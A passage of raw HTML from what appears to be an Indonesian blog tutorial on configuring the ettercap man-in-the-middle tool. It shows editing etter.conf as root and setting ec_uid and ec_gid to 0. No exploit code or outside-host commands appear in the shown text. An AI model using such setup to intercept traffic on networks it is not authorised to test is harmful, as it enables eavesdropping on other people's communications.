border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# nano /usr/local/etc/etter.conf&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maka anda akan melihat tampilan seperti ini:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Output:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;############################################################################&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;ettercap -- etter.conf -- configuration file &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;Copyright (C) ALoR &amp;amp; NaGA &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;This program is free software; you can redistribute it and/or modify &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;it under the terms of the GNU General Public License as published by &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;the Free Software Foundation; either version 2 of the License, or &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;(at your option) any later version. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;$Id: etter.conf,v 1.79 2005/07/07 10:08:55 alor Exp $ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;############################################################################&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;[privs]&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;ec_uid = 65534 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;# nobody is the default&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;ec_gid =&amp;nbsp;65534&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; # nobody is the default&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-7KthDybn1V4/TzC8GRjqw4I/AAAAAAAABNI/DaWu0w6rq_w/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://4.bp.blogspot.com/-7KthDybn1V4/TzC8GRjqw4I/AAAAAAAABNI/DaWu0w6rq_w/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;2. Mengubah parameter ec_uid dan ec_gid&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perhatikan baris&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;ec_uid&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;= 65534 dan ec_gid = 65534&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;Ubah kedua baris ini menjadi&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Output:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; line-height: normal; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;############################################################################&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;ettercap -- etter.conf -- configuration file &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;Copyright (C) ALoR &amp;amp; NaGA &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;This program is free software; you can redistribute it and/or modify &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;it under the terms of the GNU General Public License as published by &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;the Free Software Foundation; either version 2 of the License, or &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;(at your option) any later version. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;$Id: etter.conf,v 1.79 2005/07/07 10:08:55 alor Exp $ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;############################################################################&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;[privs]&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;ec_uid = 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;# nobody is the default&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;ec_gid =&amp;nbsp;0&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 